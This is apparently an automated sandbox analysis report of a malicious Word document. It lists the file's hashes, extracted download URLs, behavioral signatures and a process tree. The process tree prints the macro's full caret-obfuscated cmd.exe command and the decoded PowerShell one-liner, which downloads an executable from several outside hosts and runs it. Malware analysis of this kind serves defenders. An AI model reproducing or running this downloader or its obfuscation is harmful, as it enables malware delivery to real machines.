Analysis
-
max time kernel
172s -
max time network
223s -
platform
windows10-2004_x64 -
resource
win10v2004-20220721-en -
resource tags
arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system -
submitted
31-07-2022 09:13
Behavioral task
behavioral1
Sample
c131bb851593a57ab89577b5bb927ee4e3cd0c31140a775e871c1463f50d2fbf.doc
Resource
win7-20220718-en
Behavioral task
behavioral2
Sample
c131bb851593a57ab89577b5bb927ee4e3cd0c31140a775e871c1463f50d2fbf.doc
Resource
win10v2004-20220721-en
General
-
Target
c131bb851593a57ab89577b5bb927ee4e3cd0c31140a775e871c1463f50d2fbf.doc
-
Size
112KB
-
MD5
bb7ac1a1873e29db1f7ad69aaf4a8127
-
SHA1
e7a082ff41d8cc4a09d3f852c46cfb808659b476
-
SHA256
c131bb851593a57ab89577b5bb927ee4e3cd0c31140a775e871c1463f50d2fbf
-
SHA512
9bd8f53a8dc5bf852ce2b59f9ab697022679b1d167311c437bb56b6509a6a6c81aafd2092f88ec2e87eca5172fb022224b784d4238200a1cf33eace07ea575dd
Malware Config
Extracted
http://solvolab.com/sdB
http://kenstones.com/pR
http://benvisuals.com/S2hMkKS
http://www.clinicacirurgiaplasticasp.com.br/Jmz
http://pride.ge/0e40iT
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 1272 2172 CMd.exe 78 -
Blocklisted process makes network request 4 IoCs
flow pid Process 82 3236 powershell.exe 83 3236 powershell.exe 91 3236 powershell.exe 93 3236 powershell.exe -
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
pid Process 1272 CMd.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 2172 WINWORD.EXE 2172 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3236 powershell.exe 3236 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3236 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 2172 WINWORD.EXE 2172 WINWORD.EXE 2172 WINWORD.EXE 2172 WINWORD.EXE 2172 WINWORD.EXE 2172 WINWORD.EXE 2172 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2172 wrote to memory of 1272 2172 WINWORD.EXE 90 PID 2172 wrote to memory of 1272 2172 WINWORD.EXE 90 PID 1272 wrote to memory of 3236 1272 CMd.exe 92 PID 1272 wrote to memory of 3236 1272 CMd.exe 92
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\c131bb851593a57ab89577b5bb927ee4e3cd0c31140a775e871c1463f50d2fbf.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2172 -
C:\Windows\SYSTEM32\CMd.exeCMd /V/C"^s^e^t ^x^i^U^5=^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}^}^{^hc^t^ac^}^;^k^aer^b;^E^z^l^$^ ^m^e^t^I^-^e^kovn^I^;)^E^z^l$^ ^,^A^Q^L^$(^e^l^i^F^d^a^olnw^o^D^.^pr^Y^$^{^yrt^{)Cr^b^$^ n^i^ ^A^Q^L^$(^hc^a^er^o^f^;'^e^x^e^.^'+^p^JH^$^+^'^\^'^+c^i^l^b^u^p^:vn^e^$=^E^z^l^$^;^'^2^3^4^'^ ^=^ ^p^J^H^$^;)^'^@^'(^t^i^l^p^S^.'^T^i0^4^e^0/e^g^.^e^d^irp//^:^p^t^t^h^@^z^m^J/r^b^.^m^oc^.^p^s^ac^i^t^s^a^l^p^a^i^gr^ur^ic^acin^i^lc^.^w^w^w//^:^p^t^t^h^@^S^Kk^M^h2^S/^m^oc^.^s^l^a^us^ivn^e^b//^:^p^t^t^h^@R^p/^moc.^s^en^o^t^sn^e^k//^:^p^t^t^h^@^B^d^s/^moc^.^b^a^l^ov^lo^s//^:p^t^t^h^'=Cr^b^$;^tn^e^i^lC^b^e^W^.^t^eN^ ^tce^j^b^o^-^w^en^=^pr^Y^$^ ^l^l^e^h^sr^ewo^p&&^f^or /^L %^P ^in (^3^5^8^,^-^1,^0)^d^o ^s^e^t sX=!sX!!^x^i^U^5:~%^P,1!&&^i^f %^P=^=^0 c^a^l^l %sX:^~^4%"2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:1272 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $Yrp=new-object Net.WebClient;$brC='http://solvolab.com/sdB@http://kenstones.com/pR@http://benvisuals.com/S2hMkKS@http://www.clinicacirurgiaplasticasp.com.br/Jmz@http://pride.ge/0e40iT'.Split('@');$HJp = '432';$lzE=$env:public+'\'+$HJp+'.exe';foreach($LQA in $brC){try{$Yrp.DownloadFile($LQA, $lzE);Invoke-Item $lzE;break;}catch{}}3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3236
-
-